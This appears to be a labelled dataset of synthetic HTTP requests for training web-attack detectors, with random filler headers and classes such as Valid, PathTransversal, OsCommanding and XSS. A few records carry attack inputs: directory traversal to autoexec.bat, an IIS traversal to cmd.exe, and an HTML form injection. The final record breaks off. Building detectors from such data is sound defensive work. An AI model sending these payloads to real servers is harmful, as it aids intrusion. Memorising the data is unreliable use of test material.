GET /7RpZcpassthruotA93TO/HTOsAhaving/odtdcnd9pejetef/QHR/wp91.php?lIiEsamS3z0u=sNmail%3CsstBue%2F%24sSebody%3Fdi&gmngei=exectfm&areIhwrD=ioGe&@l-4w=39028221&orhehhroo=45563&enw=Insmtpp%3Akrm&cvsH=96888&nan=s9t&atnfie5evahn=aamte&3gxgWe=lew0rgs%246s%3AhE0a HTTP/1.1
Host: 171.57.39.31:2565
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.4, deflate;q=0.4, gzip, gzip, deflate;q=0.7
Accept-Language: *
Cache-Control: max-age=96
Client-ip: 250.98.12.167
Cookie: va=eSbing;ytorteer7enalau=(po
Cookie2: $Version="1"
Date: Thu, 23 Apr 09 04:11:16 CET
ETag: W/"yrlDJs1oar.qn35"
Expect: 100-continue
From: cOcie@dtseq.net
If-Modified-Since: Wed, 13 Feb 08 20:31:09 UTC
If-Unmodified-Since: Fri, 03 Sep 04 12:16:02 UTC
If-Match: "SvhSwG86WiMxCcKQX"
If-None-Match: "RdAYJs9t_NAoilIGrnZP"
If-Range: "Clqjz5pbnEPWmnd7w2BL"
Max-Forwards: 5
MIME-Version: 7.5
Pragma: eclz=es6scHH9
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: Digest opaque="2jsaarr"
Range: 941-,7-5
Referer: /tlfieit.cgi
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: xvhb (ivKXJLqC)
UA-CPU: StrongARM
UA-Disp: 3658,3398,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 366x415
Via: 7.9 60.152.115.181, FTP/7.6 205.54.25.177, 2.9 www.tamgetr.png
Transfer-Encoding: identity
Upgrade: rls/0.5, mx3atf/0.8, reyvel/3.5, iaelo/7.5
Warning: 299 www.sebroiht.htm "eaob" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12571
Start - Id: 13083
class: Valid
GET /wUXZq.pl?LlN74Q=giFtyM&n64G=wtfN&3wwdgar6=ezl%2B&vfnocexbuneeml=n&its=eoeEmltt&dcaoaLhohri1oi=isctrCdc+- HTTP/1.1
Host: 181.60.177.216:3678
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, deflate, deflate, deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 25.242.176.218
Cookie: bsC2fd=aea=sArllN;crtGrm6a=1772498;lmoWyflns=i a/ece
Cookie2: $Version="251"
Date: Mon, 10 Oct 05 17:59:36 GMT
ETag: W/"2GzIXExg.E1kLKICeHg"
Expect: rTltdrq
From: rbhede@fta3ii.uk
If-Modified-Since: Sun, 11 Sep 05 09:16:47 CET
If-Unmodified-Since: Sat, 13 Aug 05 06:20:18 GMT
If-Match: *
If-None-Match: *
If-Range: "1bsGkYxWuhQ8jWA"
Max-Forwards: 4
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: szdzqT tCdnv=acteb9
Authorization: NTLM MHBhcTIxTVRwaGFlYnNpYUVjZTNhVG90bGVlMWx3MFI4WXlsMzU1aA==
Range: 65780-,3-830,6-864
Referer: http://0zrC.biz/Nmgr0i/miCA/on0l8N/sokj/st5gunH.swf
TE: gzip;q=0.8,trailers,trailers
Trailer: Accept-Encoding
User-Agent: nmeglemd7r/8.6.2
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 880x583
Via: FTP/9.7 www.nseire.tiff, FTP/2.2 www.oPh4.jpeg
Transfer-Encoding: gzip
Upgrade: oepa2d/9.9
Warning: 161 www.tnAtywSi.gif "Asn6andtlSit3rohtmr" 
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: --------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13083
Start - Id: 23630
class: Valid
GET /that2bfeeeononnT/oO-gycp0Z3lXsc/oLXdZ/t7dOnd4mz/8es1tlfaoSd3tFjem/pIlB6vCn/ui6usrE9ta5/ZYOyo/u-3vUILb927LATHk/eLiIpQgYIg8.gif?rdglgeeiolpeti=c%5Dba+e6%26hso%2Fa&ryso5haopto2ft=losvielE&orc7so2O7ouaanl=Ikngorreplace7+lfoi%3Dw&4p7titS9jexlz=3&hftqwornpa=hiRDvDJr&eohe=0074&Ot3D=5&tb8ans=s7X3EQhYSa&oipvaS1AxFds9=Oaeaw&nado=oyl_L2cbY&mTigutliotsiaNn=erct&sos1Dahn9oe=rvVh9&hZIrcpA_ao@=f+ewp-ew%40irh++ttq%3Da2r&EocisyajautaNv=224&woAbiniapews3cw=3K9Iat HTTP/1.0
Host: www.uhtj4ocmo.st:3200
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale=1770
Client-ip: 88.47.180.4
Cookie: e3d=2O-2c9;Hnq=bodyjtpir2@E;iohh=1030475418;gjitqnwts=3;oilemld=327099
Cookie2: $Version="41"
Date: Thu, 08 Nov 07 16:38:44 CET
ETag: W/"_aZ@X5mjior@uCqlK5S3"
Expect: 100-continue
From: emWo@1nea.net
If-Modified-Since: Thu, 17 Jun 04 03:35:37 GMT
If-Unmodified-Since: Sun, 25 Jun 06 04:15:36 GMT
If-Match: "-0vitm36o98q2IQ"
If-None-Match: *
If-Range: "kgWx5IB-dbvyiUjuF"
Max-Forwards: 9374
MIME-Version: 4.9
Pragma: pithetbi='ki'
Proxy-Authorization: NTLM c2l0ZXlhZXJyZXVycm91dGRlUklPdGluMHRyaWN0bm90cnI3Nm0=
Authorization: Digest qop=auth
Range: 13344-7165,79151-
Referer: /iden8/3g9Rrah/41it7ej.html
TE: trailers,gzip,chunked;q=0.7
Trailer: From
User-Agent: stIxsrcynt/0.8.2
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 361x375
Via: 3.7 231.114.205.195, FTP/9.9 www.e9t1Xr.html:4
Transfer-Encoding: compress
Upgrade: tlr/3.9, insa/4.5
Warning: 398 www.tooa.css:63777 "eytbc" "Tue, 06 Sep 05 04:00:11 UTC"
X-Forwarded-For: 151.73.41.255
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23630
Start - Id: 17866
class: Valid
GET /tIh4Ac3T/ndEt8UX9MtKQ7Nm./mjK3OBWtoZiil/aad-GRd/nbspaborfn1t6ni/e2kzB9Onlw7.jpg? HTTP/1.1
Host: 71.111.190.144:11362
Connection: ar6ba
Accept: image/*, audio/x-wav, video/*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Ehot-sl, espnglnN-n8elr6i;q=0.1, syes-4I, saemcae-nfs
Cache-Control: no-store
Client-ip: 178.158.130.242
Cookie: ttoizmseailtfjk=nrYeo0xu'edocumenth[V;qte9lJdm=tesarNasuoo;n6ssnwiesetgo8=ligd ayuug
Cookie2: $Version="90"
Date: Thu, 30 Apr 09 09:55:58 CET
ETag: W/"XVzJxT5x0iekwNp05"
Expect: anaiO
From: temygise@hhgs.com
If-Modified-Since: Sat, 06 Jan 07 15:09:18 GMT
If-Unmodified-Since: Sun, 30 Nov 08 06:10:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 93
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic aXJ1c2Q6c29uZDVv
Authorization: Basic ZjhjaTp4am5udDNlaA==
Range: -321024,-932066,827-
Referer: http://www.sssUcrn.de/a1joan/grIijteO/Oeimhgx/sn0is6s/lH48.cgi
TE: trailers
Trailer: Authorization
User-Agent: 9eo2/9.7.1.2.0
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8176x316
Via: mSoc/0.4 75.50.18.115:8453, 0.7 www.folxit.shtml, 2.3 58.25.57.39
Transfer-Encoding: gzip
Upgrade: stQa7u/4.6, e3t4e/1.7, los0Y/9.6, le6ear/5.3, irt/9.2
Warning: 759 www.kSU0ou.jpeg "aaeisntpaxn" "Thu, 22 Dec 05 01:03:24 UTC"
X-Forwarded-For: 112.242.155.192
X-Serial-Number: 3494344
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17866
Start - Id: 29455
class: Valid
GET /ip4Q7FvuihyWt5@.-/a4WyGfYjG/pHR.v18jEgrPx-3./3zJw/wphpOylHEPq0zcbj/xocanepuaNbtElN.htm?aeacs=wrrwIei4nrh&uar6aanwdUbs=04482 HTTP/1.1
Host: www.pUisi8tpw.it
Connection: cnor
Accept: application/rtf;q=0.6
Accept-Charset: hz-gb-2312
Accept-Encoding: 
Accept-Language: t8liw-kib, t-fceG;q=0.0
Cache-Control: max-stale=20
Client-ip: 38.179.162.14
Cookie: ljoeii=n1rrufnvbscripthcncdlda
Cookie2: $Version="9"
Date: Mon, 12 Nov 07 10:10:00 CET
ETag: W/"w5pNSv_EbPM6fZqgoA"
Expect: 100-continue
From: t1eoE@tZ2ugooad.ch
If-Modified-Since: Fri, 30 Nov 07 18:16:02 GMT
If-Unmodified-Since: Sat, 30 Aug 08 07:08:20 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Jan 07 04:24:19 UTC
Max-Forwards: 3
MIME-Version: 1.2
Pragma: Ii='eF'
Proxy-Authorization: Basic ZDFkcUw6ZW93NGNpcg==
Authorization: Digest algorithm=Ajoo
Range: 705-82753,-558
Referer: /e2mtsn/giTd3s/gbshbksq.cfm
TE: chunked,deflate;q=0.7
Trailer: From
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 0.9; be-cs; rv:6.6.1) Gecko/53364282
UA-CPU: Sparc
UA-Disp: 206,807,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6889x7208
Via: 6.7 www.qeiy.js, mfo/7.0 248.201.197.163:564, 3.7 www.cooste.css:1757
Transfer-Encoding: ored; ipxetnb=YdListos
Upgrade: prltnc/9.6, vtkuzg/2.7, rvtwsa/5.2, e7yuc/3.8
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 7353709606596802316
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29455
Start - Id: 45489
class: PathTransversal
GET /n5DQF7-85/vJAa8VVQWH1E/0RpImio_positionincludeGQgi6/JYyTl3/t2Xp0@aiV4ylRKm/eE1geaiira/rnamwhgdMznsehOan/cbrelro7n/ieag/5sKorlxHgd/f8Pqt@9NJCINhxfBVogB/cyxjVW10zXTp.-.dll?ahrn9npacamPl=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&TenW4lq9bs1ect=otlic%29h%3AtmpofD&T1RX=789644490&te0ontngc=%3Do HTTP/1.0
Host: www.rqases.net
Connection: close
Accept: text/*, text/*;q=0.3, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.0
Accept-Language: *
Cache-Control: min-fresh=82
Client-ip: 165.251.254.128
Cookie: anhgba=cLyneoyaatbja;ll=e67uJ
Cookie2: $Version="39"
Date: Wed, 08 Jun 05 24:51:12 UTC
ETag: "SQQiLGzppLASCU-m"
Expect: 2nseryem=ktttGaR
From: rddIbt@n7reian.st
If-Modified-Since: Sat, 01 Sep 07 04:58:09 CET
If-Unmodified-Since: Sat, 12 Jan 08 14:39:54 UTC
If-Match: "P81d2kSqq7XukJFVE"
If-None-Match: *
If-Range: "2H5EVz9JwY493zkTzSg4"
Max-Forwards: 98
MIME-Version: 4.8
Pragma: o8an=ot
Proxy-Authorization: Basic cWV0b25lbGw6aGFod3U=
Authorization: NTLM cnJ0ZWhpc3NwZWFpSWNlcm9BaWVmSGlwb3Q1bXVlYXRhcGxnZWFFYXpyZXNlaWFz
Range: 7-
Referer: /lw6e4/rspr3dp/Nusi0P/iileeos/eimjwn.cfm
TE: deflate,chunked,deflate;q=0.4
Trailer: Expect
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 7.4; gn-yw; rv:7.5.4) Gecko/45510528
UA-CPU: PowerPC
UA-Disp: 187,4216,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: yynna/1.2 www.orzabf.jpg, 1.8 224.216.241.31:4824, FTP/7.4 www.rqisoe.shtml
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 402 1.54.207.201 "lrklpe" 
X-Forwarded-For: 224.80.9.55
X-Serial-Number: 15968241
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45489
Start - Id: 12076
class: Valid
GET /3HRz_logeC-fVi/n7xiHIBOYC5Rk50FORbs/.7daKbuykRtX.jpeg?iee=sf+%29s%3FyiEo&esic5ehU=gm%3Etixwa%3D HTTP/1.0
Host: www.1oraraF.fr
Connection: fndaby
Accept: */*;q=0.0
Accept-Charset: cp-950, x-mac-japanese, ks_c_5601-1987;q=0.4, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: asjnWql-eveiln1, rfs-wn, bbeAit-0orH, za-1Irch
Cache-Control: min-fresh=9381
Client-ip: 238.223.37.96
Cookie: soesm=4939235997
Cookie2: $Version="08"
Date: Mon, 19 Jul 04 06:30:22 GMT
ETag: "TD5trH1JHig-axgCFnTv"
Expect: onaNtti6=wymieb
From: teftsnmu@ndtrss.cz
If-Modified-Since: Sat, 10 Jul 04 09:55:40 GMT
If-Unmodified-Since: Thu, 27 Jul 06 23:36:08 GMT
If-Match: *
If-None-Match: *
If-Range: "xtOYyI-k6hQ8VDElc1w5"
Max-Forwards: 566
MIME-Version: 2.4
Pragma: yrn='e'
Proxy-Authorization: NTLM bjV0bmludXJhR3BuZWlkYXRkb21ub25lbFpsbm50U29jaXZqYXNlZg==
Authorization: ieAnEa oaB2onrn=eoste
Range: 86737-87721,-9149,666-
Referer: /zegseF/s4Elsml/itDam.png
TE: trailers
Trailer: User-Agent
User-Agent: agrrx/4.3.9.5.5
UA-CPU: MIPS
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: 2.4 13.86.12.180, 1nf3Hh/5.1 204.35.107.63, 7.7 158.118.51.166:97670
Transfer-Encoding: identity
Upgrade: trt/8.9
Warning: 066 www.zaynf.html "odsompreoosngeawd" "Sun, 21 Jun 09 24:00:24 GMT"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 494716334072
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12076
Start - Id: 44252
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 238.213.251.88
Connection: close
Accept: text/*, image/*
Accept-Charset: euc-kr
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: Acwta='nncutitc'
Client-ip: 182.20.30.117
Cookie: s54iee9eqeu=giifat5el6ns;tChBiasai1sd4pn=ti$r;wmhet=A>Ot1Anb[;thSyiu08Lst=2;cumoy5qd=uiq;vohn=6185062697
Cookie2: $Version="03"
Date: Fri, 16 Jan 04 19:12:07 CET
ETag: "tuLT6v@wLJeEsjmz"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Wed, 17 Jan 07 06:35:09 UTC
If-Unmodified-Since: Tue, 28 Dec 04 13:56:19 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Aug 05 09:26:38 UTC
Max-Forwards: 895
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM aXU3aWFyc3Nham9pQml5b2VudE5waXJhc2VjbWhhWGNrZG5lc2hlcg==
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: /tbfyNm.png
TE: trailers,trailers
Trailer: Range
User-Agent: ehrit/1.4.4
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 352x848
Via: 6.4 139.96.205.198:8
Transfer-Encoding: deflate
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 226 1.81.131.108 "aituhaeselhhae" 
X-Forwarded-For: 152.199.223.60
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44252
Start - Id: 29503
class: Valid
GET /aptPrRRttn5pA/processing-instructionK4fGecXIMR_H/nfiBll/fWI6O1U5Sq.eSsU4k7/aeoie3aehbut/eobof7s90dugtet/-wAlgAoptM.9yjM1/pRRNiOs0ib/a9UYHf/h4BlNwb-Bur0Oe34pgJh/qw8SRLD4Bu8S.Vp/txNP7@7.msf?ufgainl=rizr1.u&0Iewed=FOepn4rr&a0i=0shD8&niml=%5Dincludea-&ec=kobnpasswda HTTP/1.0
Host: 160.112.201.237:8
Connection: eI4aHv8R
Accept: */*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 215.49.238.10
Cookie: twh=73584633;R2elwudsU= r;jra7talzi=:;f
Cookie2: $Version="237"
Date: Thu, 24 Jun 04 02:36:46 GMT
ETag: ".K5aC.nJUaC@jNGN"
Expect: 100-continue
From: mv60oy@frtpeenv.biz
If-Modified-Since: Sat, 14 Apr 07 17:58:44 UTC
If-Unmodified-Since: Mon, 24 Jan 05 24:01:00 UTC
If-Match: "UVvytGsfexqyh6wNL"
If-None-Match: *
If-Range: "KXJmTmY2010wbOX"
Max-Forwards: 4187
MIME-Version: 6.8
Pragma: tfh=ernt
Proxy-Authorization: 40goe uren9esp=e5th
Authorization: Digest qop=dnht3
Range: 251-31,847-,2-
Referer: http://www.reoymAnr.ch/j0tttce/tSluEeei.js
TE: gzip;q=0.3,deflate,chunked;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 5.0; es-id; rv:7.5.9) Gecko/62954983
UA-CPU: Sparc
UA-Disp: 103,9341,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 641x2619
Via: 2.8 213.57.199.22:8409, HTTP/5.2 168.225.54.164, thSm/8.7 www.h9Ld.png
Transfer-Encoding: compress
Upgrade: nene/2.6
Warning: 369 www.wbAesst9.html "c8gOtonht" "Fri, 11 Sep 09 04:28:00 UTC"
X-Forwarded-For: 1.97.153.134
X-Serial-Number: 801273405
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29503
Start - Id: 44891
class: PathTransversal
GET /Qwcle4XidhihTEcnerqs/ehtyYstihtnrrt/cnaaone/gXou8IIRmy9DCU3HY/ifNae/ZdMtnotpobono.js?Gc2R0SxSll4=gLrairqnntot&hUbntonoxaean0=8313241&rreev3izMd=6167&eLvebNsoihr=0tiyhe1hban&ti=%26ihlibehe&a@LY3p=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&di2ogqrnEmsRa0=LB6m&rpb0idus=19472518 HTTP/1.1
Host: www.w6cdtea.de
Connection: keep-alive
Accept: video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 53.112.161.25
Cookie: aeeytni3ciUrae=bUaeEilxsteheei
Cookie2: $Version="65"
Date: Wed, 05 Mar 08 19:27:26 UTC
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: tshh@2vatra.org
If-Modified-Since: Sun, 20 Sep 09 07:02:31 GMT
If-Unmodified-Since: Sun, 14 Aug 05 03:03:12 GMT
If-Match: *
If-None-Match: *
If-Range: "WJMJSyHCJK6nZXzKG"
Max-Forwards: 2199
MIME-Version: 2.7
Pragma: le=qab
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic bWNscXU6Z3BkdGRv
Range: -129
Referer: /awaoenI/elocok2/mtgt.html
TE: trailers,chunked
Trailer: Via
User-Agent: rO9hEWR http://www.esrhae.biz
UA-CPU: x86
UA-Disp: 4734,136,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6797x3315
Via: 4.7 www.cllssyk.tiff
Transfer-Encoding: tsio
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44891
Start - Id: 5958
class: Valid
PUT /O@fZscriptG4htpass/-6Wx1@WxYP/ieos8uh/yszeowewiH/6RD.jpeg? HTTP/1.1
Content-Length: 166
Content-Language: li,er
Content-Encoding: compress
Content-Location: /mls6o/Eseyeoe/feUrA.doc
Content-MD5: YWlnZXJkY2VlaGRzY3Qyeg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Apr 05 17:21:04 CET
Last-Modified: Mon, 19 Jan 09 12:38:16 GMT
Host: 198.117.171.238
Connection: Utcjoe
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=8
Client-ip: 108.65.193.61
Cookie: oas8aOeMOeethpe=hTmPor4;jbYV=t/mocha;3XwZCUtXA87=8Cp;dbsrdo2=2;@HaN3=rSemi8yplrrnaiar;WwhtaNseUte=een-a
Cookie2: $Version="587"
Date: Mon, 07 Mar 05 11:46:11 UTC
ETag: "D4JobyibudxfbMib5X1"
Expect: 100-continue
From: pe4asuz@ndPtobta.gov
If-Modified-Since: Fri, 10 Jun 05 05:54:24 CET
If-Unmodified-Since: Mon, 30 Jun 08 20:09:43 GMT
If-Match: *
If-None-Match: "X6Anal1YYsxUZe8_j"
If-Range: Sat, 21 Jun 08 09:20:14 UTC
Max-Forwards: 064
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: xmqC 4sHflt=ecg4xa
Authorization: Basic d2ZlaTozd2FtbVVl
Range: -20,452299-,40896-379
Referer: /he6rd/re9a3/Adtslni.png
TE: trailers
Trailer: Via
User-Agent: Mozilla/1.0 (compatible; MSIE 0.1; WinNT; neraa; ewei; hmel)
UA-CPU: PowerPC
UA-Disp: 461,413,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 457x9352
Via: HTTP/7.2 www.snen.html, HTTP/5.0 www.tstnJm.css, 6.4 www.dceogsp.css
Transfer-Encoding: deflate
Upgrade: treana/1.3, oher5/3.1
Warning: 151 www.2kIm.png "Nieie" 
X-Forwarded-For: 248.70.206.255
X-Serial-Number: 840738575772869612
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lhotas=2soHblio6 m9nlinkn&cn8xft9ieIeee=rdrnfce&m0abi5rob4aeeo=k&oNel5ctm=e1iintdfhacs&uwtai8gen=088689139&Nooeeea6eeazoa=cshgtnrJttgugrp&rF5BNMunionorFplib=5e4wetet7

End - Id: 5958
Start - Id: 25284
class: Valid
GET /bvobject1SQoMSservicese6sli/a1u/tH/b7hlnmjid/zGXJDKqK0IFZZJ5dKypk/wZ8JeZd/aoloa6neE/sINoebD/tputhnd/r1nehr.jpeg?7AdwIsE2=169235&O0gKbGhavingk@@R=isfg7&Aloioe=nval7&teOttae=t+e&e0logadAmtlc=aur&pb=82243469&plpe=+rAgtbodyalocationhl+a%3Bee+M&nxeohsnssinpoas=2h&1VOK3Wk.A=7&eenbe4pe=7 HTTP/1.0
Host: www.Hc8tne.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, compress;q=0.7, gzip, compress, deflate
Accept-Language: *;q=0.7
Cache-Control: max-stale=2
Client-ip: 103.126.32.237
Cookie: ETkrngDCyzg1=lihn?Errevo+Rse3fa
Cookie2: $Version="74"
Date: Mon, 20 Dec 04 07:17:23 GMT
ETag: "XR9yYgKkJC90Wjz"
Expect: 100-continue
From: tgej@l4Mpeyut.cz
If-Modified-Since: Mon, 24 Jul 06 18:13:16 GMT
If-Unmodified-Since: Wed, 24 Jan 07 02:22:57 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Dec 04 04:09:05 CET
Max-Forwards: 8
MIME-Version: 9.9
Pragma: Oa='C'
Proxy-Authorization: iDor bidltu6W=esnn
Authorization: Otna2 0s3owldb=onsnxnt
Range: -65,-7
Referer: http://www.dniE.net/dNfoogsl/ettg1z/th1aa.bin
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 4.2; nu-b1; rv:1.1.3) Gecko/06175983
UA-CPU: Sparc
UA-Disp: 8204,1865,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9336x783
Via: 0.7 www.erhaecyj.css, 3.5 82.208.132.98, HTTP/5.8 www.tdecEt.htm:6921
Transfer-Encoding: deflate
Upgrade: smn6/9.9, tqura/5.8, omdo/1.2, eil2/4.6
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25284
Start - Id: 47258
class: XSS
GET /etzn7moe/ihenUmtondniapewUl/vks7svOt/2EKxgXyAANzJ1.swf?oaofpahmIen6snu=%3Cform%2Bname%3Die++%3E%3Cselect%2Bname%3Dftae++%3Ehttp%3A%2F%2Fwww.yunakt.com%2Fs%2F%3F%3C%2Fselect++++%3E%3C%2Fform++%3E&7eozT5anneqlfe=6049820&Naueu=nR HTTP/1.0
Host: 232.68.125.8
Connection: rsyatws
Accept: video/quicktime, audio/x-wav;q=0.3
Accept-Charset: iso-8859-4;q=0.9, cp-932, x-mac-japanese, x-mac-korean;q=0.7, shift_jis
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 10.37.184.28
Cookie: Sidn0odethlk8o=nXNl8Gk;hhcamsolkfxx=rxrjdsnS;5i3ealHl=unneee;toraee6s6idf=4671529;xdip=jxSqc
Cookie2: $Version="945"
Date: Thu, 23 Nov 06 22:10:39 CET
ETag: "O7yNIlPXTK89F@56Rc"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Tue, 25 Mar 08 15:51:56 CET
If-Match: "NEQ1xIigljmLlzlZuTHm"
If-None-Match: "qAvsBsEgX6ppumTUl"
If-Range: Thu, 04 Mar 10 12:02:16 UTC
Max-Forwards: 2477
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Basic ZXRhcjp0ZXppb3Nl
Range: -1,528-520677
Referer: http://www.oTEvoea.it/leSthl.cfm
TE: chunked;q=0.2,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/6.9 (X11; U; Open BSD i586 6.6; l9-nq; rv:0.2.5) Gecko/28504489
UA-CPU: StrongARM
UA-Disp: 571,3575,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: 4.9 56.143.93.248:15
Transfer-Encoding: compress
Upgrade: hth/1.0
Warning: 109 34.121.129.24 "7lqe" "Mon, 29 Oct 07 23:17:08 CET"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47258
Start - Id: 9660
class: Valid
GET /hIbAEh/lrn/TiTsXX/qNJkwL826zIntPTxdQa/iy/iSu6feAa/hE3-0YrGKaHL_jca8/j4iFZ@RNA/D3-MAJcformopenDS3/gBAioSk8nOapaSqah5@/oUNQshEK.IlqdMEad.z.jsp?6cRdsC3=do+autoexec+h5ih&fVpseZgpDlreplacegd=aac&wrkh=t+&Ectesnihpds2nx=7688987860&Ehl0eInzilBlio=oxgl&F1TwyGvhtaccesyaw=ikBYeWLjb.&iegtalniitcnhSr=9&sjahvvitdred=tJP%40Rm3vSM04 HTTP/1.1
Host: 43.85.14.194:57
Connection: keep-alive
Accept: video/*, text/html, application/*;q=0.0
Accept-Charset: windows-1254;q=0.0, windows-1250, x-mac-ce;q=0.5, x-mac-ce
Accept-Encoding: 
Accept-Language: lee-xsaSo, ooA5-krenh;q=0.6, asfiDi0-aetmscn, Ir-sEbem
Cache-Control: no-cache
Client-ip: 22.60.12.210
Cookie: 4E@htpassceHhttpG=dSHNs.27te;YtFRE-NwSfk=3;hriosdgzwd=049148;00cstptt=hhoanrruaR;nlaarnqe=2145952
Cookie2: $Version="2"
Date: Mon, 11 Jan 10 13:38:51 UTC
ETag: W/"zmPPMPAV0GmH3iQyvjqw"
Expect: 100-continue
From: ar6lncde@ohw9srxe.uk
If-Modified-Since: Fri, 18 Aug 06 24:19:27 GMT
If-Unmodified-Since: Tue, 16 Aug 05 02:38:03 UTC
If-Match: *
If-None-Match: "xTwwSc6w.NcavkgU66m8"
If-Range: "ea.Vnj-TJ4qU@Cb"
Max-Forwards: 978
MIME-Version: 6.0
Pragma: jtaomG7=heNn
Proxy-Authorization: ni3esO o9oc=rheoabn
Authorization: Basic d3RudDpydTNjZTU=
Range: 54-7853,-953,87-
Referer: /cet6x7hh/ioM9nsoa.nsf
TE: gzip;q=0.8,trailers
Trailer: TE
User-Agent: mulfeHzrdT
UA-CPU: StrongARM
UA-Disp: 0833,784,16
UA-OS: Windows 98
